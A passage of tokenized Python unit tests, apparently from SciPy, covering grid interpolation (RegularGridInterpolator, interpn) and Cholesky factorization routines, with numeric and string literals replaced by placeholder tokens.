asarray ( [ [ <NUM_LIT:0.1> , <NUM_LIT:0.1> , <NUM_LIT:1.> , <NUM_LIT> ] , [ <NUM_LIT> , <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT:0.5> , <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ] ] ) <EOL> assert_array_almost_equal ( interp ( sample ) , interp_qhull ( sample ) ) <EOL> def test_duck_typed_values ( self ) : <EOL> x = np . linspace ( <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT:5> ) <EOL> y = np . linspace ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:7> ) <EOL> values = MyValue ( ( <NUM_LIT:5> , <NUM_LIT:7> ) ) <EOL> for method in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> interp = RegularGridInterpolator ( ( x , y ) , values , <EOL> method = method ) <EOL> v1 = interp ( [ <NUM_LIT> , <NUM_LIT> ] ) <EOL> interp = RegularGridInterpolator ( ( x , y ) , values . _v , <EOL> method = method ) <EOL> v2 = interp ( [ <NUM_LIT> , <NUM_LIT> ] ) <EOL> assert_allclose ( v1 , v2 ) <EOL> def test_invalid_fill_value ( self ) : <EOL> np . random . seed ( <NUM_LIT> ) <EOL> x = np . linspace ( <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT:5> ) <EOL> y = np . linspace ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:7> ) <EOL> values = np . random . rand ( <NUM_LIT:5> , <NUM_LIT:7> ) <EOL> RegularGridInterpolator ( ( x , y ) , values , fill_value = <NUM_LIT:1> ) <EOL> assert_raises ( ValueError , RegularGridInterpolator , <EOL> ( x , y ) , values , fill_value = <NUM_LIT:1> + <NUM_LIT> ) <EOL> def test_fillvalue_type ( self ) : <EOL> values = np . ones ( ( <NUM_LIT:10> , <NUM_LIT:20> , <NUM_LIT:30> ) , dtype = '<STR_LIT>' ) <EOL> points = [ np . arange ( n ) for n in values . shape ] <EOL> xi = [ ( <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> ) ] <EOL> interpolator = RegularGridInterpolator ( points , values ) <EOL> interpolator = RegularGridInterpolator ( points , values , fill_value = <NUM_LIT:0.> ) <EOL> class MyValue ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , shape ) : <EOL> self . ndim = <NUM_LIT:2> <EOL> self . shape = shape <EOL> self . _v = np . arange ( np . prod ( shape ) ) . 
reshape ( shape ) <EOL> def __getitem__ ( self , idx ) : <EOL> return self . _v [ idx ] <EOL> def __array_interface__ ( self ) : <EOL> return None <EOL> def __array__ ( self ) : <EOL> raise RuntimeError ( "<STR_LIT>" ) <EOL> class TestInterpN ( TestCase ) : <EOL> def _sample_2d_data ( self ) : <EOL> x = np . arange ( <NUM_LIT:1> , <NUM_LIT:6> ) <EOL> x = np . array ( [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> y = np . arange ( <NUM_LIT:1> , <NUM_LIT:6> ) <EOL> y = np . array ( [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> z = np . array ( [ [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:1> ] , [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:1> ] , [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:2> , <NUM_LIT:1> ] , <EOL> [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:1> ] , [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:1> ] ] ) <EOL> return x , y , z <EOL> def test_spline_2d ( self ) : <EOL> x , y , z = self . _sample_2d_data ( ) <EOL> lut = RectBivariateSpline ( x , y , z ) <EOL> xi = np . array ( [ [ <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:3> ] , <EOL> [ <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:3> ] ] ) . T <EOL> assert_array_almost_equal ( interpn ( ( x , y ) , z , xi , method = "<STR_LIT>" ) , <EOL> lut . ev ( xi [ : , <NUM_LIT:0> ] , xi [ : , <NUM_LIT:1> ] ) ) <EOL> def test_list_input ( self ) : <EOL> x , y , z = self . _sample_2d_data ( ) <EOL> xi = np . array ( [ [ <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:3> ] , <EOL> [ <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:3> ] ] ) . T <EOL> for method in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> v1 = interpn ( ( x , y ) , z , xi , method = method ) <EOL> v2 = interpn ( ( x . tolist ( ) , y . 
tolist ( ) ) , z . tolist ( ) , <EOL> xi . tolist ( ) , method = method ) <EOL> assert_allclose ( v1 , v2 , err_msg = method ) <EOL> def test_spline_2d_outofbounds ( self ) : <EOL> x = np . array ( [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> y = np . array ( [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> z = np . array ( [ [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:1> ] , [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:1> ] , [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:2> , <NUM_LIT:1> ] , <EOL> [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:1> ] , [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:1> ] ] ) <EOL> lut = RectBivariateSpline ( x , y , z ) <EOL> xi = np . array ( [ [ <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:3> ] , <EOL> [ <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:3> ] ] ) . T <EOL> actual = interpn ( ( x , y ) , z , xi , method = "<STR_LIT>" , <EOL> bounds_error = False , fill_value = <NUM_LIT> ) <EOL> expected = lut . ev ( xi [ : , <NUM_LIT:0> ] , xi [ : , <NUM_LIT:1> ] ) <EOL> expected [ <NUM_LIT:2> : <NUM_LIT:4> ] = <NUM_LIT> <EOL> assert_array_almost_equal ( actual , expected ) <EOL> assert_raises ( ValueError , interpn , ( x , y ) , z , xi , method = "<STR_LIT>" , <EOL> bounds_error = False , fill_value = None ) <EOL> def _sample_4d_data ( self ) : <EOL> points = [ ( <NUM_LIT:0.> , <NUM_LIT> , <NUM_LIT:1.> ) ] * <NUM_LIT:2> + [ ( <NUM_LIT:0.> , <NUM_LIT> , <NUM_LIT> ) ] * <NUM_LIT:2> <EOL> values = np . asarray ( [ <NUM_LIT:0.> , <NUM_LIT> , <NUM_LIT:1.> ] ) <EOL> values0 = values [ : , np . newaxis , np . newaxis , np . newaxis ] <EOL> values1 = values [ np . newaxis , : , np . newaxis , np . newaxis ] <EOL> values2 = values [ np . newaxis , np . newaxis , : , np . newaxis ] <EOL> values3 = values [ np . newaxis , np . 
newaxis , np . newaxis , : ] <EOL> values = ( values0 + values1 * <NUM_LIT:10> + values2 * <NUM_LIT:100> + values3 * <NUM_LIT:1000> ) <EOL> return points , values <EOL> def test_linear_4d ( self ) : <EOL> points , values = self . _sample_4d_data ( ) <EOL> interp_rg = RegularGridInterpolator ( points , values ) <EOL> sample = np . asarray ( [ [ <NUM_LIT:0.1> , <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT> ] ] ) <EOL> wanted = interpn ( points , values , sample , method = "<STR_LIT>" ) <EOL> assert_array_almost_equal ( interp_rg ( sample ) , wanted ) <EOL> def test_4d_linear_outofbounds ( self ) : <EOL> points , values = self . _sample_4d_data ( ) <EOL> sample = np . asarray ( [ [ <NUM_LIT:0.1> , - <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT> ] ] ) <EOL> wanted = <NUM_LIT> <EOL> actual = interpn ( points , values , sample , method = "<STR_LIT>" , <EOL> bounds_error = False , fill_value = <NUM_LIT> ) <EOL> assert_array_almost_equal ( actual , wanted ) <EOL> def test_nearest_4d ( self ) : <EOL> points , values = self . _sample_4d_data ( ) <EOL> interp_rg = RegularGridInterpolator ( points , values , method = "<STR_LIT>" ) <EOL> sample = np . asarray ( [ [ <NUM_LIT:0.1> , <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT> ] ] ) <EOL> wanted = interpn ( points , values , sample , method = "<STR_LIT>" ) <EOL> assert_array_almost_equal ( interp_rg ( sample ) , wanted ) <EOL> def test_4d_nearest_outofbounds ( self ) : <EOL> points , values = self . _sample_4d_data ( ) <EOL> sample = np . asarray ( [ [ <NUM_LIT:0.1> , - <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT> ] ] ) <EOL> wanted = <NUM_LIT> <EOL> actual = interpn ( points , values , sample , method = "<STR_LIT>" , <EOL> bounds_error = False , fill_value = <NUM_LIT> ) <EOL> assert_array_almost_equal ( actual , wanted ) <EOL> def test_xi_1d ( self ) : <EOL> points , values = self . _sample_4d_data ( ) <EOL> sample = np . 
asarray ( [ <NUM_LIT:0.1> , <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> v1 = interpn ( points , values , sample , bounds_error = False ) <EOL> v2 = interpn ( points , values , sample [ None , : ] , bounds_error = False ) <EOL> assert_allclose ( v1 , v2 ) <EOL> def test_xi_nd ( self ) : <EOL> points , values = self . _sample_4d_data ( ) <EOL> np . random . seed ( <NUM_LIT> ) <EOL> sample = np . random . rand ( <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> ) <EOL> v1 = interpn ( points , values , sample , method = '<STR_LIT>' , <EOL> bounds_error = False ) <EOL> assert_equal ( v1 . shape , ( <NUM_LIT:2> , <NUM_LIT:3> ) ) <EOL> v2 = interpn ( points , values , sample . reshape ( - <NUM_LIT:1> , <NUM_LIT:4> ) , <EOL> method = '<STR_LIT>' , bounds_error = False ) <EOL> assert_allclose ( v1 , v2 . reshape ( v1 . shape ) ) <EOL> def test_xi_broadcast ( self ) : <EOL> x , y , values = self . _sample_2d_data ( ) <EOL> points = ( x , y ) <EOL> xi = np . linspace ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> ) <EOL> yi = np . linspace ( <NUM_LIT:0> , <NUM_LIT:3> , <NUM_LIT:3> ) <EOL> for method in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> sample = ( xi [ : , None ] , yi [ None , : ] ) <EOL> v1 = interpn ( points , values , sample , method = method , <EOL> bounds_error = False ) <EOL> assert_equal ( v1 . shape , ( <NUM_LIT:2> , <NUM_LIT:3> ) ) <EOL> xx , yy = np . meshgrid ( xi , yi ) <EOL> sample = np . c_ [ xx . T . ravel ( ) , yy . T . ravel ( ) ] <EOL> v2 = interpn ( points , values , sample , <EOL> method = method , bounds_error = False ) <EOL> assert_allclose ( v1 , v2 . reshape ( v1 . shape ) ) <EOL> def test_nonscalar_values ( self ) : <EOL> points , values = self . _sample_4d_data ( ) <EOL> np . random . seed ( <NUM_LIT> ) <EOL> values = np . random . rand ( <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:6> ) <EOL> sample = np . random . 
rand ( <NUM_LIT:7> , <NUM_LIT:11> , <NUM_LIT:4> ) <EOL> for method in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> v = interpn ( points , values , sample , method = method , <EOL> bounds_error = False ) <EOL> assert_equal ( v . shape , ( <NUM_LIT:7> , <NUM_LIT:11> , <NUM_LIT:6> ) , err_msg = method ) <EOL> vs = [ interpn ( points , values [ ... , j ] , sample , method = method , <EOL> bounds_error = False ) <EOL> for j in range ( <NUM_LIT:6> ) ] <EOL> v2 = np . array ( vs ) . transpose ( <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:0> ) <EOL> assert_allclose ( v , v2 , err_msg = method ) <EOL> assert_raises ( ValueError , interpn , points , values , sample , <EOL> method = '<STR_LIT>' ) <EOL> def test_complex ( self ) : <EOL> x , y , values = self . _sample_2d_data ( ) <EOL> points = ( x , y ) <EOL> values = values - <NUM_LIT> * values <EOL> sample = np . array ( [ [ <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:3> ] , <EOL> [ <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:3> ] ] ) . T <EOL> for method in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> v1 = interpn ( points , values , sample , method = method ) <EOL> v2r = interpn ( points , values . real , sample , method = method ) <EOL> v2i = interpn ( points , values . imag , sample , method = method ) <EOL> v2 = v2r + <NUM_LIT> * v2i <EOL> assert_allclose ( v1 , v2 ) <EOL> with warnings . catch_warnings ( ) : <EOL> warnings . simplefilter ( "<STR_LIT:error>" , category = np . ComplexWarning ) <EOL> assert_raises ( np . ComplexWarning , interpn , points , values , <EOL> sample , method = '<STR_LIT>' ) <EOL> def test_duck_typed_values ( self ) : <EOL> x = np . linspace ( <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT:5> ) <EOL> y = np . 
linspace ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:7> ) <EOL> values = MyValue ( ( <NUM_LIT:5> , <NUM_LIT:7> ) ) <EOL> for method in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> v1 = interpn ( ( x , y ) , values , [ <NUM_LIT> , <NUM_LIT> ] , method = method ) <EOL> v2 = interpn ( ( x , y ) , values . _v , [ <NUM_LIT> , <NUM_LIT> ] , method = method ) <EOL> assert_allclose ( v1 , v2 ) <EOL> def test_matrix_input ( self ) : <EOL> x = np . linspace ( <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT:5> ) <EOL> y = np . linspace ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:7> ) <EOL> values = np . matrix ( np . random . rand ( <NUM_LIT:5> , <NUM_LIT:7> ) ) <EOL> sample = np . random . rand ( <NUM_LIT:3> , <NUM_LIT:7> , <NUM_LIT:2> ) <EOL> for method in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> v1 = interpn ( ( x , y ) , values , sample , method = method ) <EOL> v2 = interpn ( ( x , y ) , np . asarray ( values ) , sample , method = method ) <EOL> assert_allclose ( v1 , np . asmatrix ( v2 ) ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> run_module_suite ( ) </s>
<s> from __future__ import division , print_function , absolute_import <EOL> from numpy . testing import TestCase , assert_array_almost_equal <EOL> from numpy import array , transpose , dot , conjugate , zeros_like <EOL> from numpy . random import random <EOL> from scipy . linalg import cholesky , cholesky_banded , cho_solve_banded , cho_factor , cho_solve <EOL> from scipy . linalg . _testutils import assert_no_overwrite <EOL> class TestCholesky ( TestCase ) : <EOL> def test_simple ( self ) : <EOL> a = [ [ <NUM_LIT:8> , <NUM_LIT:2> , <NUM_LIT:3> ] , [ <NUM_LIT:2> , <NUM_LIT:9> , <NUM_LIT:3> ] , [ <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:6> ] ] <EOL> c = cholesky ( a ) <EOL> assert_array_almost_equal ( dot ( transpose ( c ) , c ) , a ) <EOL> c = transpose ( c ) <EOL> a = dot ( c , transpose ( c ) ) <EOL> assert_array_almost_equal ( cholesky ( a , lower = <NUM_LIT:1> ) , c ) <EOL> def test_check_finite ( self ) : <EOL> a = [ [ <NUM_LIT:8> , <NUM_LIT:2> , <NUM_LIT:3> ] , [ <NUM_LIT:2> , <NUM_LIT:9> , <NUM_LIT:3> ] , [ <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:6> ] ] <EOL> c = cholesky ( a , check_finite = False ) <EOL> assert_array_almost_equal ( dot ( transpose ( c ) , c ) , a ) <EOL> c = transpose ( c ) <EOL> a = dot ( c , transpose ( c ) ) <EOL> assert_array_almost_equal ( cholesky ( a , lower = <NUM_LIT:1> , check_finite = False ) , c ) <EOL> def test_simple_complex ( self ) : <EOL> m = array ( [ [ <NUM_LIT:3> + <NUM_LIT> , <NUM_LIT:3> + <NUM_LIT> , <NUM_LIT:5> ] , [ <NUM_LIT:0> , <NUM_LIT:2> + <NUM_LIT> , <NUM_LIT:2> + <NUM_LIT> ] , [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:7> + <NUM_LIT> ] ] ) <EOL> a = dot ( transpose ( conjugate ( m ) ) , m ) <EOL> c = cholesky ( a ) <EOL> a1 = dot ( transpose ( conjugate ( c ) ) , c ) <EOL> assert_array_almost_equal ( a , a1 ) <EOL> c = transpose ( c ) <EOL> a = dot ( c , transpose ( conjugate ( c ) ) ) <EOL> assert_array_almost_equal ( cholesky ( a , lower = <NUM_LIT:1> ) , c ) <EOL> def test_random ( self ) : <EOL> n = <NUM_LIT:20> 
<EOL> for k in range ( <NUM_LIT:2> ) : <EOL> m = random ( [ n , n ] ) <EOL> for i in range ( n ) : <EOL> m [ i , i ] = <NUM_LIT:20> * ( <NUM_LIT> + m [ i , i ] ) <EOL> a = dot ( transpose ( m ) , m ) <EOL> c = cholesky ( a ) <EOL> a1 = dot ( transpose ( c ) , c ) <EOL> assert_array_almost_equal ( a , a1 ) <EOL> c = transpose ( c ) <EOL> a = dot ( c , transpose ( c ) ) <EOL> assert_array_almost_equal ( cholesky ( a , lower = <NUM_LIT:1> ) , c ) <EOL> def test_random_complex ( self ) : <EOL> n = <NUM_LIT:20> <EOL> for k in range ( <NUM_LIT:2> ) : <EOL> m = random ( [ n , n ] ) + <NUM_LIT> * random ( [ n , n ] ) <EOL> for i in range ( n ) : <EOL> m [ i , i ] = <NUM_LIT:20> * ( <NUM_LIT> + abs ( m [ i , i ] ) ) <EOL> a = dot ( transpose ( conjugate ( m ) ) , m ) <EOL> c = cholesky ( a ) <EOL> a1 = dot ( transpose ( conjugate ( c ) ) , c ) <EOL> assert_array_almost_equal ( a , a1 ) <EOL> c = transpose ( c ) <EOL> a = dot ( c , transpose ( conjugate ( c ) ) ) <EOL> assert_array_almost_equal ( cholesky ( a , lower = <NUM_LIT:1> ) , c ) <EOL> class TestCholeskyBanded ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_check_finite ( self ) : <EOL> a = array ( [ [ <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ] , <EOL> [ <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT:0.5> , <NUM_LIT:0.0> ] , <EOL> [ <NUM_LIT:0.0> , <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ] ] ) <EOL> ab = array ( [ [ - <NUM_LIT:1.0> , <NUM_LIT:1.0> , <NUM_LIT:0.5> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ] ) <EOL> c = cholesky_banded ( ab , lower = False , check_finite = False ) <EOL> ufac = zeros_like ( a ) <EOL> ufac [ list ( range ( <NUM_LIT:4> ) ) , list ( range ( <NUM_LIT:4> ) ) ] = c [ - <NUM_LIT:1> ] <EOL> ufac [ ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> ) , ( <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ) ] = c [ <NUM_LIT:0> , <NUM_LIT:1> : ] <EOL> assert_array_almost_equal ( a , dot ( ufac . 
T , ufac ) ) <EOL> b = array ( [ <NUM_LIT:0.0> , <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> x = cho_solve_banded ( ( c , False ) , b , check_finite = False ) <EOL> assert_array_almost_equal ( x , [ <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ] ) <EOL> def test_upper_real ( self ) : <EOL> a = array ( [ [ <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ] , <EOL> [ <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT:0.5> , <NUM_LIT:0.0> ] , <EOL> [ <NUM_LIT:0.0> , <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ] ] ) <EOL> ab = array ( [ [ - <NUM_LIT:1.0> , <NUM_LIT:1.0> , <NUM_LIT:0.5> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ] ) <EOL> c = cholesky_banded ( ab , lower = False ) <EOL> ufac = zeros_like ( a ) <EOL> ufac [ list ( range ( <NUM_LIT:4> ) ) , list ( range ( <NUM_LIT:4> ) ) ] = c [ - <NUM_LIT:1> ] <EOL> ufac [ ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> ) , ( <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ) ] = c [ <NUM_LIT:0> , <NUM_LIT:1> : ] <EOL> assert_array_almost_equal ( a , dot ( ufac . 
T , ufac ) ) <EOL> b = array ( [ <NUM_LIT:0.0> , <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> x = cho_solve_banded ( ( c , False ) , b ) <EOL> assert_array_almost_equal ( x , [ <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ] ) <EOL> def test_upper_complex ( self ) : <EOL> a = array ( [ [ <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ] , <EOL> [ <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT:0.5> , <NUM_LIT:0.0> ] , <EOL> [ <NUM_LIT:0.0> , <NUM_LIT:0.5> , <NUM_LIT> , - <NUM_LIT> ] , <EOL> [ <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ] ] ) <EOL> ab = array ( [ [ - <NUM_LIT:1.0> , <NUM_LIT:1.0> , <NUM_LIT:0.5> , - <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ] ) <EOL> c = cholesky_banded ( ab , lower = False ) <EOL> ufac = zeros_like ( a ) <EOL> ufac [ list ( range ( <NUM_LIT:4> ) ) , list ( range ( <NUM_LIT:4> ) ) ] = c [ - <NUM_LIT:1> ] <EOL> ufac [ ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> ) , ( <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ) ] = c [ <NUM_LIT:0> , <NUM_LIT:1> : ] <EOL> assert_array_almost_equal ( a , dot ( ufac . conj ( ) . 
T , ufac ) ) <EOL> b = array ( [ <NUM_LIT:0.0> , <NUM_LIT:0.5> , <NUM_LIT> - <NUM_LIT> , <NUM_LIT> + <NUM_LIT> ] ) <EOL> x = cho_solve_banded ( ( c , False ) , b ) <EOL> assert_array_almost_equal ( x , [ <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ] ) <EOL> def test_lower_real ( self ) : <EOL> a = array ( [ [ <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ] , <EOL> [ <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT:0.5> , <NUM_LIT:0.0> ] , <EOL> [ <NUM_LIT:0.0> , <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ] ] ) <EOL> ab = array ( [ [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT:1.0> , <NUM_LIT:0.5> , <NUM_LIT> , - <NUM_LIT:1.0> ] ] ) <EOL> c = cholesky_banded ( ab , lower = True ) <EOL> lfac = zeros_like ( a ) <EOL> lfac [ list ( range ( <NUM_LIT:4> ) ) , list ( range ( <NUM_LIT:4> ) ) ] = c [ <NUM_LIT:0> ] <EOL> lfac [ ( <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ) , ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> ) ] = c [ <NUM_LIT:1> , : <NUM_LIT:3> ] <EOL> assert_array_almost_equal ( a , dot ( lfac , lfac . 
T ) ) <EOL> b = array ( [ <NUM_LIT:0.0> , <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> x = cho_solve_banded ( ( c , True ) , b ) <EOL> assert_array_almost_equal ( x , [ <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:1.0> , <NUM_LIT:1.0> ] ) <EOL> def test_lower_complex ( self ) : <EOL> a = array ( [ [ <NUM_LIT> , <NUM_LIT:1.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ] , <EOL> [ <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT:0.5> , <NUM_LIT:0.0> ] , <EOL> [ <NUM_LIT:0.0> , <NUM_LIT:0.5> , <NUM_LIT> , - <NUM_LIT> ] , <EOL> [ <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ] ] ) <EOL> ab = array ( [ [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT:1.0> , <NUM_LIT:0.5> , <NUM_LIT> , - <NUM_LIT:1.0> ] ] ) <EOL> c = cholesky_banded ( ab , lower = True ) <EOL> lfac = zeros_like ( a ) <EOL> lfac [ list ( range ( <NUM_LIT:4> ) ) , list ( range ( <NUM_LIT:4> ) ) ] = c [ <NUM_LIT:0> ] <EOL> lfac [ ( <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ) , ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> ) ] = c [ <NUM_LIT:1> , : <NUM_LIT:3> ] <EOL> assert_array_almost_equal ( a , dot ( lfac , lfac . conj ( ) . 
T ) ) <EOL> b = array ( [ <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> x = cho_solve_banded ( ( c , True ) , b ) <EOL> assert_array_almost_equal ( x , [ <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT:1.0> ] ) <EOL> class TestOverwrite ( object ) : <EOL> def test_cholesky ( self ) : <EOL> assert_no_overwrite ( cholesky , [ ( <NUM_LIT:3> , <NUM_LIT:3> ) ] ) <EOL> def test_cho_factor ( self ) : <EOL> assert_no_overwrite ( cho_factor , [ ( <NUM_LIT:3> , <NUM_LIT:3> ) ] ) <EOL> def test_cho_solve ( self ) : <EOL> x = array ( [ [ <NUM_LIT:2> , - <NUM_LIT:1> , <NUM_LIT:0> ] , [ - <NUM_LIT:1> , <NUM_LIT:2> , - <NUM_LIT:1> ] , [ <NUM_LIT:0> , - <NUM_LIT:1> , <NUM_LIT:2> ] ] ) <EOL> xcho = cho_factor ( x ) <EOL> assert_no_overwrite ( lambda b : cho_solve ( xcho , b ) , [ ( <NUM_LIT:3> , ) ] ) <EOL> def test_cholesky_banded ( self ) : <EOL> assert_no_overwrite ( cholesky_banded , [ ( <NUM_LIT:2> , <NUM_LIT:3> ) ] ) <EOL> def test_cho_solve_banded ( self ) : <EOL> x = array ( [ [ <NUM_LIT:0> , - <NUM_LIT:1> , - <NUM_LIT:1> ] , [ <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> ] ] ) <EOL> xcho = cholesky_banded ( x ) <EOL> assert_no_overwrite ( lambda b : cho_solve_banded ( ( xcho , False ) , b ) , <EOL> [ ( <NUM_LIT:3> , ) ] ) </s>
